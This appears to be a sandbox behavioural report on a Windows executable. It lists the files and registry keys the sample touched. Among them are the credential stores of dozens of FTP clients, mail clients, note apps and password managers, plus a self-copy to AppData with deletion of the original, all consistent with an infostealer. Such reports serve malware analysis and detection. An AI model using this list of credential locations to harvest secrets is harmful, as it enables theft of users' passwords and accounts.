C:\Users\Seven01\AppData\Local\ExpanDrive C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt C:\Users\Seven01\AppData\Roaming\FlashFXP C:\ProgramData\FlashFXP C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat C:\ProgramData\NetDrive2\drives.dat C:\Users\Seven01\AppData\Roaming\SmartFTP C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db C:\Users\Seven01\Documents\*.tlp C:\Users\Seven01\Documents\*.bscp C:\Users\Seven01\Documents\*.vnc C:\Users\Seven01\Desktop\*.vnc C:\Users\Seven01\Documents\mSecure C:\ProgramData\Syncovery C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP C:\Program Files (x86)\Foxmail\mail C:\Foxmail* C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini C:\Users\Seven01\Documents\Pocomail\accounts.ini C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail C:\Program Files (x86)\WinFtp Client\Favorites.dat C:\Windows\32BitFtp.TMP C:\Windows\32BitFtp.ini C:\FTP Navigator\Ftplist.txt C:\Softwarenetz\Mailing\Daten\mailing.vdt C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat C:\Users\Seven01\Documents\*Mailbox.ini C:\Users\Seven01\Documents\yMail2\POP3.xml C:\Users\Seven01\Documents\yMail2\SMTP.xml C:\Users\Seven01\Documents\yMail2\Accounts.xml C:\Users\Seven01\Documents\yMail\ymail.ini C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config C:\Users\Seven01\Documents\*.spn C:\Users\Seven01\Desktop\*.spn C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db C:\Users\Seven01\AppData\Roaming\stickies\images C:\Users\Seven01\AppData\Roaming\stickies\rtf C:\Users\Seven01\AppData\Roaming\NoteFly\notes C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt C:\Users\Seven01\Documents C:\Users\Seven01\Documents\*.kdbx C:\Users\Seven01\Desktop C:\Users\Seven01\Desktop\*.kdbx C:\Users\Seven01\Documents\*.kdb C:\Users\Seven01\Desktop\*.kdb C:\Users\Seven01\Documents\Enpass C:\Users\Seven01\Documents\My RoboForm Data C:\Users\Seven01\Documents\1Password C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox C:\Users\Seven01\AppData\Local\Temp\NETAPI32.DLL C:\Windows\System32\netapi32.dll C:\Users\Seven01\AppData\Local\Temp\netutils.dll C:\Windows\System32\netutils.dll C:\Users\Seven01\AppData\Local\Temp\srvcli.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877 C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\* C:\Users\Seven01\AppData\Local\Microsoft\Credentials C:\Users\Seven01\AppData\Local\Microsoft\Credentials\* C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 C:\Windows\Temp C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp C:\Windows\ServiceProfiles C:\Windows\ServiceProfiles\LocalService C:\Windows\sysnative\Tasks\Microsoft\Windows\WDI\ResolutionHost C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat C:\Windows\Fonts\arial.ttf C:\Windows\Fonts\ariali.ttf C:\Windows\Fonts\arialbd.ttf C:\Windows\Fonts\arialbi.ttf C:\Windows\Fonts\batang.ttc C:\Windows\Fonts\cour.ttf C:\Windows\Fonts\couri.ttf C:\Windows\Fonts\courbd.ttf C:\Windows\Fonts\courbi.ttf C:\Windows\Fonts\daunpenh.ttf C:\Windows\Fonts\dokchamp.ttf C:\Windows\Fonts\estre.ttf C:\Windows\Fonts\euphemia.ttf C:\Windows\Fonts\gautami.ttf C:\Windows\Fonts\gautamib.ttf C:\Windows\Fonts\Vani.ttf C:\Windows\Fonts\Vanib.ttf C:\Windows\Fonts\gulim.ttc C:\Windows\Fonts\impact.ttf C:\Windows\Fonts\iskpota.ttf C:\Windows\Fonts\iskpotab.ttf C:\Windows\Fonts\kalinga.ttf C:\Windows\Fonts\kalingab.ttf C:\Windows\Fonts\kartika.ttf C:\Windows\Fonts\kartikab.ttf C:\Windows\Fonts\KhmerUI.ttf C:\Windows\Fonts\KhmerUIb.ttf C:\Windows\Fonts\LaoUI.ttf C:\Windows\Fonts\LaoUIb.ttf C:\Windows\Fonts\latha.ttf C:\Windows\Fonts\lathab.ttf C:\Windows\Fonts\lucon.ttf C:\Windows\Fonts\malgun.ttf C:\Windows\Fonts\malgunbd.ttf C:\Windows\Fonts\mangal.ttf C:\Windows\Fonts\mangalb.ttf C:\Windows\Fonts\meiryo.ttc C:\Windows\Fonts\meiryob.ttc C:\Windows\Fonts\himalaya.ttf C:\Windows\Fonts\msjh.ttf C:\Windows\Fonts\msjhbd.ttf C:\Windows\Fonts\msyh.ttf C:\Windows\Fonts\msyhbd.ttf C:\Windows\Fonts\mingliu.ttc C:\Windows\Fonts\mingliub.ttc C:\Windows\Fonts\monbaiti.ttf C:\Windows\Fonts\msgothic.ttc C:\Windows\Fonts\msmincho.ttc C:\Windows\Fonts\mvboli.ttf C:\Windows\Fonts\ntailu.ttf C:\Windows\Fonts\ntailub.ttf C:\Windows\Fonts\nyala.ttf C:\Windows\Fonts\phagspa.ttf C:\Windows\Fonts\phagspab.ttf C:\Windows\Fonts\plantc.ttf C:\Windows\Fonts\raavi.ttf C:\Windows\Fonts\raavib.ttf C:\Windows\Fonts\segoesc.ttf C:\Windows\Fonts\segoescb.ttf C:\Windows\Fonts\segoeui.ttf C:\Windows\Fonts\segoeuib.ttf C:\Windows\Fonts\segoeuii.ttf C:\Windows\Fonts\segoeuiz.ttf C:\Windows\Fonts\seguisb.ttf C:\Windows\Fonts\segoeuil.ttf C:\Windows\Fonts\seguisym.ttf C:\Windows\Fonts\shruti.ttf C:\Windows\Fonts\shrutib.ttf C:\Windows\Fonts\simsun.ttc C:\Windows\Fonts\simsunb.ttf C:\Windows\Fonts\sylfaen.ttf C:\Windows\Fonts\taile.ttf C:\Windows\Fonts\taileb.ttf C:\Windows\Fonts\times.ttf C:\Windows\Fonts\timesi.ttf C:\Windows\Fonts\timesbd.ttf C:\Windows\Fonts\timesbi.ttf C:\Windows\Fonts\tunga.ttf C:\Windows\Fonts\tungab.ttf C:\Windows\Fonts\vrinda.ttf C:\Windows\Fonts\vrindab.ttf C:\Windows\Fonts\Shonar.ttf C:\Windows\Fonts\Shonarb.ttf C:\Windows\Fonts\msyi.ttf C:\Windows\Fonts\tahoma.ttf C:\Windows\Fonts\tahomabd.ttf C:\Windows\Fonts\micross.ttf C:\Windows\Fonts\angsa.ttf C:\Windows\Fonts\angsai.ttf C:\Windows\Fonts\angsab.ttf C:\Windows\Fonts\angsaz.ttf C:\Windows\Fonts\aparaj.ttf C:\Windows\Fonts\aparajb.ttf C:\Windows\Fonts\aparajbi.ttf C:\Windows\Fonts\aparaji.ttf C:\Windows\Fonts\cordia.ttf C:\Windows\Fonts\cordiai.ttf C:\Windows\Fonts\cordiab.ttf C:\Windows\Fonts\cordiaz.ttf C:\Windows\Fonts\ebrima.ttf C:\Windows\Fonts\ebrimabd.ttf C:\Windows\Fonts\gisha.ttf C:\Windows\Fonts\gishabd.ttf C:\Windows\Fonts\kokila.ttf C:\Windows\Fonts\kokilab.ttf C:\Windows\Fonts\kokilabi.ttf C:\Windows\Fonts\kokilai.ttf C:\Windows\Fonts\leelawad.ttf C:\Windows\Fonts\leelawdb.ttf C:\Windows\Fonts\msuighur.ttf C:\Windows\Fonts\moolbor.ttf C:\Windows\Fonts\symbol.ttf C:\Windows\Fonts\utsaah.ttf C:\Windows\Fonts\utsaahb.ttf C:\Windows\Fonts\utsaahbi.ttf C:\Windows\Fonts\utsaahi.ttf C:\Windows\Fonts\vijaya.ttf C:\Windows\Fonts\vijayab.ttf C:\Windows\Fonts\wingding.ttf C:\Windows\Fonts\modern.fon C:\Windows\Fonts\roman.fon C:\Windows\Fonts\script.fon C:\Windows\Fonts\andlso.ttf C:\Windows\Fonts\arabtype.ttf C:\Windows\Fonts\simpo.ttf C:\Windows\Fonts\simpbdo.ttf C:\Windows\Fonts\simpfxo.ttf C:\Windows\Fonts\majalla.ttf C:\Windows\Fonts\majallab.ttf C:\Windows\Fonts\trado.ttf C:\Windows\Fonts\tradbdo.ttf C:\Windows\Fonts\ahronbd.ttf C:\Windows\Fonts\david.ttf C:\Windows\Fonts\davidbd.ttf C:\Windows\Fonts\frank.ttf C:\Windows\Fonts\lvnm.ttf C:\Windows\Fonts\lvnmbd.ttf C:\Windows\Fonts\mriam.ttf C:\Windows\Fonts\mriamc.ttf C:\Windows\Fonts\nrkis.ttf C:\Windows\Fonts\rod.ttf C:\Windows\Fonts\simfang.ttf C:\Windows\Fonts\simhei.ttf C:\Windows\Fonts\simkai.ttf C:\Windows\Fonts\angsau.ttf C:\Windows\Fonts\angsaui.ttf C:\Windows\Fonts\angsaub.ttf C:\Windows\Fonts\angsauz.ttf C:\Windows\Fonts\browa.ttf C:\Windows\Fonts\browai.ttf C:\Windows\Fonts\browab.ttf C:\Windows\Fonts\browaz.ttf C:\Windows\Fonts\browau.ttf C:\Windows\Fonts\browaui.ttf C:\Windows\Fonts\browaub.ttf C:\Windows\Fonts\browauz.ttf C:\Windows\Fonts\cordiau.ttf C:\Windows\Fonts\cordiaub.ttf C:\Windows\Fonts\cordiauz.ttf C:\Windows\Fonts\cordiaui.ttf C:\Windows\Fonts\upcdl.ttf C:\Windows\Fonts\upcdi.ttf C:\Windows\Fonts\upcdb.ttf C:\Windows\Fonts\upcdbi.ttf C:\Windows\Fonts\upcel.ttf C:\Windows\Fonts\upcei.ttf C:\Windows\Fonts\upceb.ttf C:\Windows\Fonts\upcebi.ttf C:\Windows\Fonts\upcfl.ttf C:\Windows\Fonts\upcfi.ttf C:\Windows\Fonts\upcfb.ttf C:\Windows\Fonts\upcfbi.ttf C:\Windows\Fonts\upcil.ttf C:\Windows\Fonts\upcii.ttf C:\Windows\Fonts\upcib.ttf C:\Windows\Fonts\upcibi.ttf C:\Windows\Fonts\upcjl.ttf C:\Windows\Fonts\upcji.ttf C:\Windows\Fonts\upcjb.ttf C:\Windows\Fonts\upcjbi.ttf C:\Windows\Fonts\upckl.ttf C:\Windows\Fonts\upcki.ttf C:\Windows\Fonts\upckb.ttf C:\Windows\Fonts\upckbi.ttf C:\Windows\Fonts\upcll.ttf C:\Windows\Fonts\upcli.ttf C:\Windows\Fonts\upclb.ttf C:\Windows\Fonts\upclbi.ttf C:\Windows\Fonts\kaiu.ttf C:\Windows\Fonts\l_10646.ttf C:\Windows\Fonts\ariblk.ttf C:\Windows\Fonts\calibri.ttf C:\Windows\Fonts\calibrii.ttf C:\Windows\Fonts\calibrib.ttf C:\Windows\Fonts\calibriz.ttf C:\Windows\Fonts\cambria.ttc C:\Windows\Fonts\cambriai.ttf C:\Windows\Fonts\cambriab.ttf C:\Windows\Fonts\cambriaz.ttf C:\Windows\Fonts\Candara.ttf C:\Windows\Fonts\Candarai.ttf C:\Windows\Fonts\Candarab.ttf C:\Windows\Fonts\Candaraz.ttf C:\Windows\Fonts\comic.ttf C:\Windows\Fonts\comicbd.ttf C:\Windows\Fonts\consola.ttf C:\Windows\Fonts\consolai.ttf C:\Windows\Fonts\consolab.ttf C:\Windows\Fonts\consolaz.ttf C:\Windows\Fonts\constan.ttf C:\Windows\Fonts\constani.ttf C:\Windows\Fonts\constanb.ttf C:\Windows\Fonts\constanz.ttf C:\Windows\Fonts\corbel.ttf C:\Windows\Fonts\corbeli.ttf C:\Windows\Fonts\corbelb.ttf C:\Windows\Fonts\corbelz.ttf C:\Windows\Fonts\framd.ttf C:\Windows\Fonts\framdit.ttf C:\Windows\Fonts\Gabriola.ttf C:\Windows\Fonts\georgia.ttf C:\Windows\Fonts\georgiai.ttf C:\Windows\Fonts\georgiab.ttf C:\Windows\Fonts\georgiaz.ttf C:\Windows\Fonts\pala.ttf C:\Windows\Fonts\palai.ttf C:\Windows\Fonts\palab.ttf C:\Windows\Fonts\palabi.ttf C:\Windows\Fonts\segoepr.ttf C:\Windows\Fonts\segoeprb.ttf C:\Windows\Fonts\trebuc.ttf C:\Windows\Fonts\trebucit.ttf C:\Windows\Fonts\trebucbd.ttf C:\Windows\Fonts\trebucbi.ttf C:\Windows\Fonts\verdana.ttf C:\Windows\Fonts\verdanai.ttf C:\Windows\Fonts\verdanab.ttf C:\Windows\Fonts\verdanaz.ttf C:\Windows\Fonts\webdings.ttf C:\Windows\Fonts\coure.fon C:\Windows\Fonts\serife.fon C:\Windows\Fonts\sserife.fon C:\Windows\Fonts\smalle.fon C:\Windows\Fonts\smallf.fon C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\EQUATION\MTEXTRA.TTF C:\Windows\Fonts\ARIALUNI.TTF C:\Windows\Fonts\CENTURY.TTF C:\Windows\Fonts\WINGDNG2.TTF C:\Windows\Fonts\WINGDNG3.TTF C:\Windows\Fonts\BKANT.TTF C:\Windows\Fonts\GOTHIC.TTF C:\Windows\Fonts\OUTLOOK.TTF C:\Windows\Fonts\TEMPSITC.TTF C:\Windows\Fonts\MISTRAL.TTF C:\Windows\Fonts\LHANDW.TTF C:\Windows\Fonts\ITCKRIST.TTF C:\Windows\Fonts\JUICE___.TTF C:\Windows\Fonts\FREESCPT.TTF C:\Windows\Fonts\ARIALN.TTF C:\Windows\Fonts\GARA.TTF C:\Windows\Fonts\MTCORSVA.TTF C:\Windows\Fonts\ALGER.TTF C:\Windows\Fonts\BASKVILL.TTF C:\Windows\Fonts\BAUHS93.TTF C:\Windows\Fonts\BELL.TTF C:\Windows\Fonts\BRLNSB.TTF C:\Windows\Fonts\BERNHC.TTF C:\Windows\Fonts\BOD_PSTC.TTF C:\Windows\Fonts\BRITANIC.TTF C:\Windows\Fonts\BROADW.TTF C:\Windows\Fonts\BRUSHSCI.TTF C:\Windows\Fonts\CALIFR.TTF C:\Windows\Fonts\CENTAUR.TTF C:\Windows\Fonts\CHILLER.TTF C:\Windows\Fonts\COLONNA.TTF C:\Windows\Fonts\COOPBL.TTF C:\Windows\Fonts\FTLTLT.TTF C:\Windows\Fonts\HARLOWSI.TTF C:\Windows\Fonts\HARNGTON.TTF C:\Windows\Fonts\HTOWERT.TTF C:\Windows\Fonts\JOKERMAN.TTF C:\Windows\Fonts\KUNSTLER.TTF C:\Windows\Fonts\LBRITE.TTF C:\Windows\Fonts\LCALLIG.TTF C:\Windows\Fonts\LFAX.TTF C:\Windows\Fonts\MAGNETOB.TTF C:\Windows\Fonts\MATURASC.TTF C:\Windows\Fonts\MOD20.TTF C:\Windows\Fonts\NIAGENG.TTF C:\Windows\Fonts\NIAGSOL.TTF C:\Windows\Fonts\OLDENGL.TTF C:\Windows\Fonts\ONYX.TTF C:\Windows\Fonts\PARCHM.TTF C:\Windows\Fonts\PLAYBILL.TTF C:\Windows\Fonts\POORICH.TTF C:\Windows\Fonts\RAVIE.TTF C:\Windows\Fonts\INFROMAN.TTF C:\Windows\Fonts\SHOWG.TTF C:\Windows\Fonts\SNAP____.TTF C:\Windows\Fonts\STENCIL.TTF C:\Windows\Fonts\VINERITC.TTF C:\Windows\Fonts\VIVALDII.TTF C:\Windows\Fonts\VLADIMIR.TTF C:\Windows\Fonts\LATINWD.TTF C:\Windows\Fonts\BOOKOS.TTF C:\Windows\Fonts\ANTQUAB.TTF C:\Windows\Fonts\ANTQUABI.TTF C:\Windows\Fonts\ANTQUAI.TTF C:\Windows\Fonts\GOTHICB.TTF C:\Windows\Fonts\GOTHICBI.TTF C:\Windows\Fonts\GOTHICI.TTF C:\Windows\Fonts\BSSYM7.TTF C:\Windows\Fonts\REFSAN.TTF C:\Windows\Fonts\REFSPCL.TTF C:\Windows\Fonts\ARIALNB.TTF C:\Windows\Fonts\ARIALNBI.TTF C:\Windows\Fonts\ARIALNI.TTF C:\Windows\Fonts\GARABD.TTF C:\Windows\Fonts\GARAIT.TTF C:\Windows\Fonts\BELLB.TTF C:\Windows\Fonts\BELLI.TTF C:\Windows\Fonts\BRLNSDB.TTF C:\Windows\Fonts\BRLNSR.TTF C:\Windows\Fonts\CALIFB.TTF C:\Windows\Fonts\CALIFI.TTF C:\Windows\Fonts\HTOWERTI.TTF C:\Windows\Fonts\LBRITED.TTF C:\Windows\Fonts\LBRITEDI.TTF C:\Windows\Fonts\LBRITEI.TTF C:\Windows\Fonts\LFAXD.TTF C:\Windows\Fonts\LFAXDI.TTF C:\Windows\Fonts\LFAXI.TTF C:\Windows\Fonts\BOOKOSB.TTF C:\Windows\Fonts\BOOKOSBI.TTF C:\Windows\Fonts\BOOKOSI.TTF C:\Windows\Fonts\marlett.ttf C:\Windows\sysnative\it-IT\radarrs.dll.mui C:\Windows\sysnative\radarrs.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx \??\PIPE\wkssvc C:\Windows\sysnative\winevt\Logs\System.evtx C:\Windows\sysnative\RacEngn.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\98765123.exe.config C:\Users\Seven01\AppData\Local\Temp\98765123.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\System32\l_intl.nls \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\netutils.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat C:\Windows\Fonts\modern.fon C:\Windows\Fonts\roman.fon C:\Windows\Fonts\script.fon C:\Windows\Fonts\coure.fon C:\Windows\Fonts\serife.fon C:\Windows\Fonts\sserife.fon C:\Windows\Fonts\smalle.fon C:\Windows\Fonts\smallf.fon C:\Windows\sysnative\it-IT\radarrs.dll.mui C:\Windows\sysnative\radarrs.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx \??\PIPE\wkssvc C:\Windows\sysnative\RacEngn.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx
Write Files
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx \??\PIPE\wkssvc C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2752.3734578 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2752.3734578 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2752.3734671 C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Local\Temp\98765123.exe
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\98765123.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 